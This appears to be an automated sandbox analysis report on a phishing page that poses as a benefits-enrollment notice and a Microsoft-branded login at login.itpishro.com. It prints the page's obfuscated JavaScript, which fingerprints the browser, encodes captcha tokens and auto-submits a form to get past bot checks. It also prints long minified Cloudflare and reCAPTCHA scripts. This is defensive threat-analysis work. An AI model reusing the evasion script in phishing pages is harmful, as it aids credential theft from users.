| URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "If you fail to enroll this November, your current benefits will not roll over and you will have to wait until the next open enrollment period (November 2025).",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "If you fail to enroll this November, your current benefits will not roll over and you will have to wait until the next open enrollment period (November 2025).",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
| URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
| URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
| URL: :// Model: Joe Sandbox AI | ```json
{
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: :// |
| URL: https://login.itpishro.com/vmiddle9999... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While some of the behaviors may be related to legitimate functionality, such as browser detection and CAPTCHA handling, the overall complexity and lack of transparency raise significant security concerns."
} |
history.replaceState({},"","/");
(function (_0x2b8318, _0x263e16) {
var _0x41b7ab = _0x10f1, _0x1397c9 = _0x2b8318();
while (!![]) {
try {
var _0x56aa45 = parseInt(_0x41b7ab(0x1d8)) / 0x1 + -parseInt(_0x41b7ab(0x1d1)) / 0x2 * (-parseInt(_0x41b7ab(0x1d4)) / 0x3) + parseInt(_0x41b7ab(0x1ce)) / 0x4 + -parseInt(_0x41b7ab(0x1d0)) / 0x5 + -parseInt(_0x41b7ab(0x1d2)) / 0x6 + parseInt(_0x41b7ab(0x1d5)) / 0x7 * (parseInt(_0x41b7ab(0x1cf)) / 0x8) + -parseInt(_0x41b7ab(0x1d7)) / 0x9;
if (_0x56aa45 === _0x263e16)
break;
else
_0x1397c9['push'](_0x1397c9['shift']());
} catch (_0x4bf6eb) {
_0x1397c9['push'](_0x1397c9['shift']());
}
}
}(_0x83b1, 0x37b68));
function _0x74739(_0x1c737b) {
var _0xe2ac07 = _0x10f1, _0x41fa4e = '';
for (var _0x859b98 = 0x0; _0x859b98 < _0x1c737b[_0xe2ac07(0x1d3)]; _0x859b98++) {
_0x41fa4e += '' + _0x1c737b['charCodeAt'](_0x859b98)[_0xe2ac07(0x1d6)](0x10);
}
return _0x41fa4e;
}
function _0x10f1(_0x1774c9, _0x33db3a) {
var _0x83b16f = _0x83b1();
return _0x10f1 = function (_0x10f12d, _0x1f2413) {
_0x10f12d = _0x10f12d - 0x1ce;
var _0x2cd561 = _0x83b16f[_0x10f12d];
return _0x2cd561;
}, _0x10f1(_0x1774c9, _0x33db3a);
}
function _0x83b1() {
var _0x868a6c = [
'10344HVpkDN',
'1802055NkIvet',
'107612iBMkFH',
'1466220eCvEHF',
'length',
'18umtuTH',
'987DihKGv',
'toString',
'4036734cyjByR',
'360792nEGbWg',
'1662264AFuwvD'
];
_0x83b1 = function () {
return _0x868a6c;
};
return _0x83b1();
}
var result = bowser.getParser(window.navigator.userAgent);
document.getElementById("bValue").value = _0x74739(result.parsedResult.browser.name)
document.getElementById("pValue").value = _0x74739(result.parsedResult.platform.type)
grecaptcha.ready(function() {
// do request for recaptcha token
// response is promise with passed token
grecaptcha.execute('6LfRF5kqAAAAAAuW2dANii_JwRF95-vsYuOAqHr0', {action:'validate_captcha'})
.then(function(token) {
// add token value to form
document.getElementById('g-recaptcha-response').value = _0x74739(token);
});
});
window.onloadTurnstileCallback = function () {
turnstile.render('#igp', {
sitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
callback: function(token) {
document.getElementById('cCapt').value = _0x74739(token);
setTimeout(() => {
document.getElementById("subAct").submit();
},5000);
},
});
};
//document.getElementById("subAct").submit();
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script sets up various configuration options for the Cloudflare challenge and includes some communication with the parent window. While it uses some dynamic code execution techniques, such as `postMessage()`, the overall behavior seems to be within the expected scope of a legitimate Cloudflare challenge implementation. Therefore, the risk score is assessed as low, as the script is likely serving a legitimate security purpose."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'clr6f',
chlApiSitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'dMN7WPMEilCThpKwN1ZLnKgfhwwlJTKBI24xz0Y1S2w-1734379902-1.3.1.1-QTizu6SqBHyr3J8fisEiOU1HssjNb7FRVANhV1U8POA',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f3152f6ae848c9c',
cH: '4ixbLmqEBL.yWhCKH7kuZNUuCOQgR_WvZF1cwuZROWI-1734379902-1.1.1.1-gp5.HGiiAtH5IBI9Vd8MFZ.KWLXHWDfDj5u9XG9ViDp9TIBSGN3H5bT9THGAmYCC',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: '98UWXCGHJd.0VVbOS.wJEmzr7IPVRoTp8c99K5_Y_L0-1734379902-1.1.1.1-qVOb56vudH4axfwchw5y73ZOOovh66H7b4k93VK.SvyWZD9WSIFKaks2ce_WL3hkE1gA8dZXDKof6LgYrrN2UUlXvmp9SU.XJLMNDGAwzkb_aFxQjfI9Sy4sgOYNb8HdG72O6CICRADFs9qABpJONDti7LoBlr6yEYUN5PkForAk3qoLt6UwXaN.IBoFcJ1AdxWTXgbfUekmmRg1YOJ5rZNvh8qAW_qSVeaK4sOXgenn1bNNTM3FGvxU7I5txiGWfPosRngYhA.mfx9pAt5H.yFI3ig2CPvqTMjbbYABmI5xs6HmtUz81AWor2XUjNZlpdiJDYL3qx1LG5lYQpYaHpKl2vkUcEfw1ZQ1uDw_ddEBPmij5qEPC1EQESf3yZmYT.80CLTpgWakle4sWBhHVrYLxvBa8p9GyPkdjrAMTCih3kcjeJ9q3tu.MJsjB7OoaRQnhH5XVm.vgJ9P6mL8ZU5mlN0U3WWxFiNVVVcev0lnWVHQOE11K2GSmOXFmnbrR6zfAfJgmNJE7nPwqg_oLZG32QyPhw6_HDOW93GeCCbEISDiA9kSUafaNOQIGTL7kahlo8PL7owBEFT.1PVaD87FziIK7NSb9HaLmPb6QWIugXrAuShlJGLy1.LxRpvFFhSjByOjhy39.fiLwW3s0mW31k94bYzmB4Hm6UJd8L30SlricnAu_ukmQXAhE4C7E_SY9Mo4Wf0V5fhEpPc1U3buOIVsM3QeUcJOCfWtnDhYRFtNl.aJeavcmpJBCe.O9tc0oVBGmFU79cUlhKIXeJjP.htoe7904TNJ6PwABrheC.wmvCF1R7gFnaEFCOwy7_SeoDUVyQSoXE1H7MV_oMg9qFqEsnyOjWGIoWKPKv4d0vmpwCzN9S_uOxnmfJjDB0E5FRuHdD3qCDO0OdRi1rgkuP68io_JLlzdsoyd9X3nQKB1hXWmQx_CQ9gFFNUVNpKhCtXFhiiJQV5DF9zwnhOia9OUKNiA0k74XEPeZ4EpWy0ixqmww1hXsxzli2ZntvjmEws8rWKaBDu2XmfiR215ZPwYSZow0JuyzQPUctGteimnd0fXngjDuMNFHN.s_5ymDZnGpRybFHSkP7ARZ8SCWZBpfHUsI.GaQxxNdG.Byi2htnLsHzkn2Uuz6kX8DiYPBibM10rYs3HyxfR9eiunwE2r6J0D89lM9lVum0uLLKkh42s.UwozBcWPCV.XbT5X_b05zVnoKGZp9Qn9DRLXgH2ggNKoe7.GdTsKCuTVoZsJU1dvbv9pgB9kt7BR5ZU5d4zRJCwQ6NmvMmB5d_gm7jx6nQxwrHUM0b_yPRZMcRGXrwexLmNModRMUC6nF01E0YGToAOXjSmShv1TKUkI1M908n3bk2SlAPdQmTRUhhJee6ToVUZkett1L3Mg.prW6iPUrp7TvYa9Fg4kZw',
cITimeS: '1734379902',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'clr6f',
nextRcV: 'dMN7WPMEilCThpKwN1ZLnKgfhwwlJTKBI24xz0Y1S2w-1734379902-1.3.1.1-QTizu6SqBHyr3J8fisEiOU1HssjNb7FRVANhV1U8POA',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://challenges.cloudflare.com/turnstile/v0/g/f... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
 |
| URL: https://login.itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.itpishro.com |
| URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be related to Cloudflare's Turnstile challenge, which is a legitimate security mechanism used to verify users. The script contains translations and configuration options for the Turnstile challenge, which is a common practice for websites that use Cloudflare's services. There are no clear indicators of malicious behavior, and the script seems to be serving a legitimate purpose."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_refresh":"Refresh","testing_only":"Testing%20only.","turnstile_timeout":"Timed%20out","turnstile_overrun_description":"Stuck%20here%3F","turnstile_feedback_report":"Having%20trouble%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_failure":"Error","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_footer_terms":"Terms","turnstile_feedback_description":"Send%20Feedback","turnstile_success":"Success%21","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_expired":"Expired","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20are%20human","turnstile_footer_privacy":"Privacy","turnstile_verifying":"Verifying...","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eR,eU,eV,fl,fm,fq,fr,fs,fz,fF,fI,fK,fL,fM,fY,ga,gg,gh,gi,gs,gD,gH,eS,eT){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(938))/1+parseInt(gI(1242))/2+parseInt(gI(905))/3+-parseInt(gI(550))/4*(-parseInt(gI(1160))/5)+-parseInt(gI(617))/6+parseInt(gI(1831))/7+-parseInt(gI(965))/8,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,162404),eM=this||self,eN=eM[gJ(1337)],eM[gJ(1026)]=function(c,gU,e){e=(gU=gJ,{'CUvVM':function(g,h){return g(h)}});try{return eQ(c)}catch(g){return e[gU(1621)](eO,eP(c))}},eR=function(gV,d,e,f,g){return gV=gJ,d={'STJDv':function(h,i){return h<i},'OpdLT':gV(1069),'DZpTH':gV(1187),'qWkfa':function(h,i){return h(i)},'ehWeG':function(h,i){return h|i},'tdBji':function(h,i){return i&h},'DyGtl':function(h,i){return h(i)},'IsfGg':function(h,i){return i|h},'mNoXV':function(h,i){return i==h},'kxupn':function(h,i){return h(i)},'yCEQi':function(h,i){return h<<i},'lDFru':function(h,i){return h<i},'RspxZ':function(h,i){return h(i)},'SgIhO':function(h,i){return h!==i},'PfAcu':function(h,i){return h>i},'Mqjuo':function(h,i){return h<i},'AOXau':function(h,i){return h(i)},'pdlde':function(h,i){return h>i},'RavbC':function(h,i){return h|i},'AmEiV':function(h,i){return h==i},'PTOqa':function(h,i){return h-i},'fswZZ':function(h,i){return h(i)},'npwoa':gV(1875),'ctWVY':function(h,i){return h|i},'YoIfi':function(h,i){return h|i},'XgkPr':function(h,i){return h<<i},'GfTyF':function(h,i){return h(i)},'VOVpD':function(h,i){return i==h},'UFNPm':function(h,i){return h(i)},'jGRuX':function(h,i){return h<<i},'ZhlCh':gV(855),'uGLRM':gV(1092),'TmUce':gV(1717),'aNkhT':function(h,i){re |
| URL: https://www.gstatic.com/recaptcha/releases/pPK749s... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a legitimate Google reCAPTCHA implementation, with no obvious malicious behaviors. It includes code related to analytics, telemetry, and DOM manipulation, but these are common practices for a reCAPTCHA widget. The code is also well-commented and licensed under the Apache 2.0 and MIT licenses, indicating it is likely part of a legitimate open-source project. Overall, this script poses a low risk and is likely used for its intended purpose of providing a reCAPTCHA challenge."
} |
(function(){/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright Google LLC
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.
Copyright The Closure Library Authors.
SPDX-License-Identifier: MIT
*/
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var T=function(){return[function(r,d,h,V,R,K,Y,S,N,D,F,E,l,B,C,m){return(r|32)==(((C=["fr","flat",2],r)-C[2]>>4||(m=new Promise(function(P){window.addEventListener("visibilitychange",P,{once:!0}),document.hidden||P()})),r-7>>4)||(E=[2654435761,0,"1"],Y.wb=K===void 0?!1:K,B=b[38](26,Y,V),N=g[16](55,B),Y[C[0]]=N.next().value,Y.C=N.next().value,Y.rI=N.next().value,Y.Zf=N.next().value,F=Y.R()[C[1]](Infinity),S=F.findIndex(function(P){return P instanceof dy&&k[17](15,P,h)==d}),l=g[9](5,F[S],lj,3,p[12](77)),
D=[n[48](22,Y[C[0]]),A[43](38,Y.rI,U[9](11,Y[C[0]]),E[0]),A[10](27,3,Y.rI,U[9](19,Y.rI),E[1]),A[10](28,3,Y.Zf,U[9](19,R),Y.bf),A[10](24,3,Y.Zf,U[9](35,Y.Zf),U[9](27,Y.rI)),T[11](20,T[26](64,h,l[h])),k[30](55,h,E[C[2]],F,Y,Y.Xa)],U[47](20,E[1],Y),m=D),r)&&(K=g[31](9,1,d,V+R,gy),Y=h.map(function(P,v){return K[v%K.length]}),m=p[30](28,0,Y,h)),m},function(r,d,h,V,R,K,Y,S,N){if(N=[75,"userAgent",46],(r&N[0])==r){a:{if(V=By.navigator)if(h=V[N[1]]){d=h;break a}d=""}S=d}if((r>>1&14)==((r|24)==r&&(p[48](18,
h.B),h.F=d),r-5&13||(V=e[48](10,d,h),S=V=="array"||V==d&&typeof h.length=="number"),2))a:{if(n[32](N[2])&&V!=="Silk"){if(!(Y=kG.brands.find(function(D){return D.brand===V}),Y)||!Y.version){S=NaN;break a}K=Y.version.split(".")}else{if((R=U[28](1,"OPR",h,d,"8.0",V),R)===""){S=NaN;break a}K=R.split(".")}S=K.length===0?NaN:Number(K[0])}return(r>>2&3)==3&&(Y=b[15](45,V,pZ(),h),S=function(D,F){return D=b[F=["concat",1,"reduce"],29](F[1],F[1],0,255,d+Y(),K),{rm:k[26](10,0,R[F[0]](D).map(function(E){return A[14](9,
0,E)})[F[2]](function(E,l){return E.xor(l)})),A0:D}}),S},function(r,d,h,V){return(r^25)<((r|(V=[37,28,27],5))>>4||(d=T[9](26,this.U),h=U[45](2,!1,V[1],this.U,d,!1)),V[0])&&r+4>=V[2]&&H.call(this,d),h},function(r,d,h,V,R,K){return(r+(R=[1,24,29],(r-2|7)<r&&(r-R[0]|55)>=r&&(K=sM(function(){return h().parent!=h()?!0:h().frameElement!=null?!0:!1},!0)),2)&R[2])>=r&&(r+5^28)<r&&(K=CZ(ij(d,h),V)),(r|32)==r&&H.call(this,d),(r|R[1])==r&&(K=function(Y,S,N,D,F,E,l,B,C){C=[5,"aO","push"],UM.length?(E=UM.pop(),
g[C[0]](4,E,S),e[8](63,void 0,S,void 0,Y,E.U),D=E):D=new vy(Y,S),F=D;try{l=new V,N=l[C[1]],p[18](25,null,h)(N,F),B=l}finally{F.U.clear(),F.J=-1,F.R=-1,UM.length<d&&UM[C[2]](F)}return B}),K},function(r,d,h,V,R,K,Y,S){if((S=["call",32,47],(r|1)&2)==2){K=["/m/04w67_",'<div class="',"TileSelectionStreetSign"],R=K[1]+p[40](S[2],"rc-imageselect-desc-no-canonical")+h;switch(A[18](56,V)?V.toString():V){case K[2]:R+="Tap the center of the <strong>street signs</strong>";break;case "/m/0k4j":R+="Tap the center of the <strong>cars</strong>";
break;case K[0]:R+="Tap the center of the <strong>mail boxes</strong>"}Y=$G(R+d)}if((r^30)>=20&&(r^25)<S[1])H[S[0]](this,d,0,"dresp");if((r|48)==r)H[S[0]](this,d);return Y},function(r,d,h,V,R,K,Y){if((r+5&7)==(((K=[1,2,"call"],r^7)&12)<5&&(r^32)>>4>=K[1]&&(Hy[K[2]](this,d),this.U=[[]],this.C=K[0]),K)[1]){R=[7,0,127],Wy(V);for(Wy(h);h>R[K[0]]||V>R[K[1]];)d.U.push(V&R[K[1]]|128),V=(V>>>R[0]|h<<25)>>>R[K[0]],h>>>=R[0];d.U.push(V)}if((r>>K[0]&11)==K[0])MB[K[2]](this,360,20);return Y},function(r,d,h,V,
R,K,Y,S,N){return((r|((r&46)==(r+5<(N=["J","U","hN"],23)&&(r^37)>=8&&(p[19](44,V),h=e[10](50,V,h),V[N[1]].has(h)&&(V.K=d,V[N[0]]-=V[N[1]].get(h).length,V[N[1]]["delete"](h))),r)&&(K=["n","waf",!0],R.B=Date.now(),X$=R.yM,R[N[0]]=U[32](32,R[N[1]])?new yx(R.yM,R.O,n[6](50,z1,R[N[1]])):new a9(R.yM,R.O),R[N[0]].R=A[27](4,9,R[N[2]]),p[41](2)?R[N[0]].u(n[9](83,"t",K[2],R),n[5](37,"-",R.id),!1):(R.K=p[19](76,0,K[2],V,R),V===1&&window.___grecaptcha_cfg[K[1]]&&window.___grecaptcha_cfg[K[1]].includes("session")&&
U[32](41,R[N[1]])&&e[34](41,5,K[0],R),U[32](33,R[ |
| URL: https://www.google.com/js/bg/FsaNIYyPN76i0sL7d3myI... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a minified and obfuscated code, which makes it difficult to analyze. However, based on the observed behaviors, it does not seem to contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code appears to be related to some form of analytics or telemetry functionality, which is a relatively low-risk activity. While the use of legacy APIs like `XDomainRequest` and aggressive DOM manipulation are present, these are considered low-risk indicators. Overall, the risk score is assessed as 3, indicating a low-risk script that may require further review but does not demonstrate clear malicious intent."
} |
/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var E=this||self,e=function(q,b){if(b=(q=null,E).trustedTypes,!b||!b.createPolicy)return q;try{q=b.createPolicy("bg",{createHTML:T,createScript:T,createScriptURL:T})}catch(v){E.console&&E.console.error(v.message)}return q},T=function(q){return q};(0,eval)(function(q,b){return(b=e())&&q.eval(b.createScript("1"))===1?function(v){return b.createScript(v)}:function(v){return""+v}}(E)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',
'',
' Copyright Google LLC',
' SPDX-License-Identifier: Apache-2.0',
'*/',
'var S=function(b,q,v,T,e,G,d,c){if(!q.uF&&(d=void 0,v&&v[0]===O&&(b=v[1],d=v[2],v=void 0),G=l(q,354),G.length==0&&(e=l(q,416)>>3,G.push(b,e>>8&255,e&255),d!=void 0&&G.push(d&255)),b="",v&&(v.message&&(b+=v.message),v.stack&&(b+=":"+v.stack)),v=l(q,28),v[0]>3)){q.C=(v=(v[0]-=(b=b.slice(0,(v[0]|0)-3),(b.length|0)+3),b=qE(b),q.C),q);try{q.H8?(T=(T=l(q,462))&&T[T.length-1]||95,(c=l(q,33))&&c[c.length-1]==T||H([T&255],q,33)):H([95],q,462),H(g(2,b.length).concat(b),q,258,9)}finally{q.C=v}}},Ep=function(b,q,v,T,e){function G(){}return{invoke:function(d,c,P,E){function Y(){v(function(f){v9(function(){d(f)})},P)}if(!c)return c=e(P),d&&d(c),c;v?Y():(E=G,G=function(){v9((E(),Y))})},pe:(T=(e=(b=b9(b,function(d){G&&(q&&v9(q),v=d,G(),G=void 0)},(v=void 0,!!q)),b[0]),b[1]),function(d){T&&T(d)})}},TC=function(b,q){function v(){this.S=(this.n=0,[])}return[function(T){b.G6(T),q.G6(T)},(q=new (v.prototype.E_=(v.prototype.G6=function(T,e){this.S.length<(this.n++,50)?this.S.push(T):(e=Math.floor(Math.random()*this.n),e<50&&(this.S[e]=T))},function(){if(this.n===0)return[0,0];return[(this.S.sort(function(T,e){return T-e}),this.n),this.S[this.S.length>>1]]}),b=new v,v),function(T){return q=(T=b.E_().concat(q.E_()),new v),T})]},Z,YY=function(b){return b},f4=function(b,q){return b[q]<<24|b[(q|0)+1]<<16|b[(q|0)+2]<<8|b[(q|0)+3]},W=function(b,q,v,T,e,G){if(b.Z.length){b.mR=(b.g=!(b.g&&":TQR:TQR:"(),0),v);try{e=b.X(),b.U=e,b.A=0,b.O=0,b.v=e,T=GC(v,b),q=q?0:10,G=b.X()-b.v,b.e6+=G,b.Z2&&b.Z2(G-b.u,b.N,b.L,b.O),b.u=0,b.L=false,b.N=false,G<q||b.W8--<=0||(G=Math.floor(G),b.CU.push(G<=254?G:254))}finally{b.g=false}return T}},NE=function(b,q){return X[q](X.prototype,{floor:b,propertyIsEnumerable:b,parent:b,replace:b,pop:b,console:b,splice:b,call:b,stack:b,document:b,prototype:b,length:b})},a=this||self,J=function(b,q,v){if(b==246||b==416)q.I[b]?q.I[b].concat(v):q.I[b]=Op(v,q);else{if(q.uF&&b!=278)return;b==214||b==258||b==454||b==290||b==354||b==462||b==33||b==172||b==221||b==28?q.I[b]||(q.I[b]=QP(v,86,b,q)):q.I[b]=QP(v,105,b,q)}b==278&&(q.Y=w(false,q,32),q.J=void 0)},z=function(b,q,v,T,e,G,d){d=this;try{l9(G,this,e,v,q,T,b)}catch(c){t(c,this),T(function(P){P(d.H)})}},l=function(b,q){if(b=b.I[q],b===void 